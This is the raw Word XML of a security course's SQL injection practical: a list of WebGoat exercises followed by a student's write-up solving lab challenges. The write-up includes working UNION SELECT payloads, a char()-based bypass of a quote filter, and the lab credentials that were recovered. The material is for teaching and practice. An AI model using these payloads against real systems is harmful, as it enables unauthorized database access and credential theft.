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3C21D" w14:textId="77777777" w:rsidR="002337D4" w:rsidRPr="00043E73" w:rsidRDefault="00927FB8" w:rsidP="002337D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Practical 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AABA9C" w14:textId="77777777" w:rsidR="002337D4" w:rsidRPr="002337D4" w:rsidRDefault="008D1B7E" w:rsidP="002337D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SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="12" w:space="0" w:color="auto"/>
          <w:bottom w:val="single" w:sz="12" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9026"/>
      </w:tblGrid>
      <w:tr w:rsidR="002337D4" w14:paraId="2C19C91C" w14:textId="77777777" w:rsidTr="006E2E4B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9245" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35C5D7FA" w14:textId="77777777" w:rsidR="002337D4" w:rsidRPr="00B15DD9" w:rsidRDefault="002337D4" w:rsidP="006E2E4B">
            <w:pPr>
              <w:pStyle w:val="Heading9"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B15DD9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Objectives:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="01FB5B7B" w14:textId="77777777" w:rsidR="002337D4" w:rsidRPr="00B15DD9" w:rsidRDefault="002337D4" w:rsidP="006E2E4B">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="709"/>
              </w:tabs>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B15DD9">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:tab/>
              <w:t>After completing this lab, you should be able to:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22F12001" w14:textId="77777777" w:rsidR="002337D4" w:rsidRPr="00B15DD9" w:rsidRDefault="008D1B7E" w:rsidP="002337D4">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="709"/>
              </w:tabs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SQL Injection on a vulnerable webpage to retrieve data</w:t>
            </w:r>
            <w:r w:rsidR="002337D4">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17658130" w14:textId="77777777" w:rsidR="002337D4" w:rsidRPr="00116563" w:rsidRDefault="002337D4" w:rsidP="006E2E4B">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="709"/>
              </w:tabs>
              <w:ind w:left="709"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7444F343" w14:textId="77777777" w:rsidR="002337D4" w:rsidRDefault="002337D4" w:rsidP="002337D4">
      <w:pPr>
        <w:ind w:rightChars="-15" w:right="-33"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1435451B" w14:textId="77777777" w:rsidR="00605007" w:rsidRPr="00C922A3" w:rsidRDefault="00C922A3" w:rsidP="00C922A3">
      <w:pPr>
        <w:ind w:rightChars="-15" w:right="-33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1) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00605007" w:rsidRPr="00C922A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Webgoat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00605007" w:rsidRPr="00C922A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C31D8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Exercises</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA8E8B6" w14:textId="77777777" w:rsidR="00C03DC5" w:rsidRPr="008726E4" w:rsidRDefault="008726E4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008726E4">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="008726E4">
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> exercises:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF46809" w14:textId="77777777" w:rsidR="008726E4" w:rsidRDefault="008726E4">
      <w:r>
        <w:t xml:space="preserve">Navigate to </w:t>
      </w:r>
      <w:r w:rsidR="006E2E4B">
        <w:t xml:space="preserve">(A1) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">injection </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6747D38B" w14:textId="77777777" w:rsidR="008726E4" w:rsidRPr="00C922A3" w:rsidRDefault="006E2E4B" w:rsidP="00C922A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00605007">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Lab SQL Injection</w:t>
      </w:r>
      <w:r w:rsidR="00A93A12" w:rsidRPr="00605007">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (Intro)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498B7721" w14:textId="77777777" w:rsidR="008D1B7E" w:rsidRDefault="00A93A12" w:rsidP="00C922A3">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Complete Exercises 1-11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0665FB98" w14:textId="77777777" w:rsidR="00C922A3" w:rsidRDefault="00A93A12" w:rsidP="00C922A3">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Exercise 12-13 is optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11719817" w14:textId="77777777" w:rsidR="00C922A3" w:rsidRDefault="00C922A3" w:rsidP="008D1B7E">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DE461BA" w14:textId="77777777" w:rsidR="00C922A3" w:rsidRDefault="00C922A3" w:rsidP="00C922A3">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Exercise 1-5 focuses on SQL syntax revision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D85FF53" w14:textId="77777777" w:rsidR="00C922A3" w:rsidRDefault="00C922A3" w:rsidP="00C922A3">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t>Exercise 6-11 focuses on basic SQL injection techniques</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A0FC6E" w14:textId="42144E2B" w:rsidR="006D1E40" w:rsidRDefault="00C922A3" w:rsidP="00C922A3">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exercise 12-13 is on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> query chaining (optional)</w:t>
      </w:r>
      <w:r w:rsidR="00A93A12">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20078F7B" w14:textId="0BDE9743" w:rsidR="00C13E2B" w:rsidRDefault="00C13E2B" w:rsidP="00C922A3">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="360"/>
      </w:pPr>
      <w:r w:rsidRPr="00C13E2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="755DA733" wp14:editId="0A0882F5">
            <wp:extent cx="5731510" cy="27158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C34E" w14:textId="755ED4CA" w:rsidR="00C922A3" w:rsidRDefault="00C922A3" w:rsidP="00A93A12">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C13E2B" w:rsidRPr="00C13E2B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C3A5E27" wp14:editId="1C0B378D">
            <wp:extent cx="5731510" cy="297688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4EE7" w14:textId="77777777" w:rsidR="00C13E2B" w:rsidRDefault="00C13E2B" w:rsidP="00A93A12"/>
    <w:p w14:paraId="0F515BC9" w14:textId="77777777" w:rsidR="00A93A12" w:rsidRPr="00605007" w:rsidRDefault="00A93A12" w:rsidP="00A93A12">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00605007">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Lab SQL Injection (Advanced)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3AD655" w14:textId="77777777" w:rsidR="00605007" w:rsidRDefault="00605007" w:rsidP="00A93A12">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F3D4A14" w14:textId="77777777" w:rsidR="00A93A12" w:rsidRDefault="00605007" w:rsidP="00A93A12">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Complete exercises 1-3 on SQL Union injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4FBAE0" w14:textId="77777777" w:rsidR="00A93A12" w:rsidRDefault="00A93A12" w:rsidP="00A93A12">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00605007">
        <w:t xml:space="preserve">Exercise 4-5 on blind </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00605007">
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00605007">
        <w:t xml:space="preserve"> injection is optional </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C12CDE" w14:textId="77777777" w:rsidR="006D1E40" w:rsidRDefault="006D1E40" w:rsidP="008D1B7E">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE32679" w14:textId="77777777" w:rsidR="00C922A3" w:rsidRDefault="00C922A3" w:rsidP="008D1B7E">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0447EA78" w14:textId="77777777" w:rsidR="006D1E40" w:rsidRPr="00C922A3" w:rsidRDefault="00C922A3" w:rsidP="00C922A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2) </w:t>
      </w:r>
      <w:r w:rsidRPr="00C922A3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mimosa Challenges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FAB078" w14:textId="77777777" w:rsidR="006D1E40" w:rsidRDefault="00605007" w:rsidP="00C922A3">
      <w:r w:rsidRPr="00C922A3">
        <w:t>Complete the newly released mimosa SQL injection challenges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D50D240" w14:textId="77777777" w:rsidR="008D7F4E" w:rsidRDefault="008D1B7E" w:rsidP="008D7F4E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008D7F4E" w:rsidRPr="00CB6F94">
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">**You are strongly encouraged to attempt the questions and document the steps on how you solve the challenges. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709E8EE1" w14:textId="77777777" w:rsidR="008D7F4E" w:rsidRPr="002F46D8" w:rsidRDefault="008D7F4E" w:rsidP="008D7F4E">
      <w:r w:rsidRPr="00CB6F94">
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Your Tutor may require you to submit as part of your progress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB6F94">
        <w:rPr>
          <w:b/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> or General Performance</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C481610" w14:textId="77777777" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="496846C5" w14:textId="77777777" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F07BF59" w14:textId="77777777" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69DDB28A" w14:textId="77777777" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AA86657" w14:textId="77777777" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F31CAFF" w14:textId="77777777" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="728E3A4E" w14:textId="77777777" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="565232E5" w14:textId="77777777" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DDC3F55" w14:textId="2A776332" w:rsidR="00D52328" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0032707A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Dazala</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41252D23" w14:textId="76C469D4" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:r>
        <w:t>Find the number of columns by using order by.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CC85BA" w14:textId="4D9E3777" w:rsidR="0032707A" w:rsidRPr="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:r>
        <w:t>Then use union select to get this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111A611D" w14:textId="49C2C08C" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032707A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4318B469" wp14:editId="11E588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9F6A" w14:textId="07787B6E" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:r w:rsidRPr="0032707A">
        <w:t>Next</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>concat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to get the answer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3423D1C6" w14:textId="583773BD" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:r w:rsidRPr="0032707A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B5E7EA0" wp14:editId="5C30D3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9F8" w14:textId="216EADA7" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:r>
        <w:t>We can see from this table the answer is ‘root’ and ‘secure123’.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E089398" w14:textId="1A130357" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A"/>
    <w:p w14:paraId="6673E144" w14:textId="0695E48B" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A"/>
    <w:p w14:paraId="3F6D5F1F" w14:textId="447C2D59" w:rsidR="0032707A" w:rsidRPr="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032707A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Fakebook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BDFE6F" w14:textId="24399B59" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:r w:rsidRPr="0032707A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3941D640" wp14:editId="081EE4B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6EC3" w14:textId="5FF4E6ED" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:r>
        <w:t>Use order by to see that there is 1 column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514C0B1B" w14:textId="6546E279" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:r w:rsidRPr="0032707A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6ABC2FC0" wp14:editId="3528475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EC2" w14:textId="25D68EEE" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A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1 UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>table_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>;--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33360C84" w14:textId="77D91518" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:pPr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Use union select to get the table names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0B4156" w14:textId="5C7EE6DC" w:rsidR="0032707A" w:rsidRPr="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0032707A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0B6B5ECA" wp14:editId="723A0219">
            <wp:extent cx="5731510" cy="320929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551" w14:textId="77777777" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A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1 UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>column_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>information_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>schema.columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> WHERE table_name=concat(char(102),char(97),char(107),char(101),char(98),char(111),char(111),char(107));--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6B296D" w14:textId="249A651D" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:r>
        <w:t xml:space="preserve">By converting ‘fakebook’ into decimal, we can use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) and char() to bypass the quote filter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5225CDA5" w14:textId="70FB1D8C" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:r w:rsidRPr="0032707A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57C1B8AE" wp14:editId="5C1D7414">
            <wp:extent cx="5731510" cy="3194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6E7B" w14:textId="18BE4908" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:r>
        <w:t xml:space="preserve">Then use an online hash cracker to find the password. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57047BF1" w14:textId="276A66CC" w:rsidR="0032707A" w:rsidRDefault="0032707A" w:rsidP="0032707A">
      <w:r>
        <w:t xml:space="preserve">The password is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>adawong</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F6712F" w14:textId="0460E016" w:rsidR="00044960" w:rsidRDefault="00044960" w:rsidP="0032707A"/>
    <w:p w14:paraId="13814E76" w14:textId="62ABCD9F" w:rsidR="00044960" w:rsidRDefault="00044960" w:rsidP="0032707A"/>
    <w:p w14:paraId="73FC34E9" w14:textId="6DA12541" w:rsidR="00044960" w:rsidRPr="00044960" w:rsidRDefault="00044960" w:rsidP="0032707A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00044960">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Notflix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5DAB6D23" w14:textId="3BBA227B" w:rsidR="00044960" w:rsidRDefault="00044960" w:rsidP="0032707A">
      <w:r w:rsidRPr="00044960">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7918210B" wp14:editId="2D87544F">
            <wp:extent cx="5731510" cy="319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A2F8" w14:textId="33D85C14" w:rsidR="00044960" w:rsidRDefault="00044960" w:rsidP="0032707A">
      <w:r>
        <w:t xml:space="preserve">Using ‘ORDER BY </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>3;--</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> - to see how many columns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5140E9" w14:textId="7FD2B5D4" w:rsidR="00044960" w:rsidRDefault="00044960" w:rsidP="0032707A">
      <w:r w:rsidRPr="00044960">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="225DCBB8" wp14:editId="61FB46A9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4379" w14:textId="77777777" w:rsidR="00044960" w:rsidRDefault="00044960" w:rsidP="00044960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a' UNION SELECT </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>1,table</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">_name,3 FROM </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> OFFSET 30;--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5196908F" w14:textId="2B616768" w:rsidR="00044960" w:rsidRDefault="00044960" w:rsidP="0032707A">
      <w:r>
        <w:t xml:space="preserve">By selecting the table name from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  <w:r>
        <w:t>, I can see the table names in the database. Need to use OFFSET 30 to find the users table as the backend only allow maximum 3 results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C8C74A" w14:textId="3F43F35C" w:rsidR="00044960" w:rsidRDefault="00044960" w:rsidP="0032707A">
      <w:r w:rsidRPr="00044960">
        <w:lastRenderedPageBreak/>
